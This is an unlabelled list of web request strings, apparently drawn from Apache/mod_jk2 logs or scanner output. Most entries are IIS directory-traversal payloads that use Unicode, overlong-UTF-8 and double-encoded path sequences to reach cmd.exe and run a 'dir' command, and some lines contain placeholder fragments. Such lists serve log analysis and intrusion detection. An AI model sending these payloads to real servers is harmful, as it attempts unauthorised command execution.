env.createBean2():
mod_security/<a>.9dev2
jk2_init()
/etc/httpd/conf/workers2.properties
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/scripts/..%35c../winnt/system32/cmd.exe?/c+dir
/var/www/html/scripts/..%5c%5c..
/scripts/..%e0%<b>%af../..%e0%<b>%af../..%e0%<b>%af../winnt/system32/cmd.exe?/c+dir
/var/www/html/scripts/..%5c..
/var/www/html/scripts/..\xc1\x1c..
/var/www/html/scripts/..\xc0\xaf..
/var/www/html/scripts/..\xc1\x9c..
/var/www/html/scripts/..%2f..
mod_jk2
/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
/var/www/html/cgi-bin2
/var/www/html/b2
/var/www/html/b2evo
/var/www/html/b2exo
/var/www/html/ip1.cgi
RFC2616
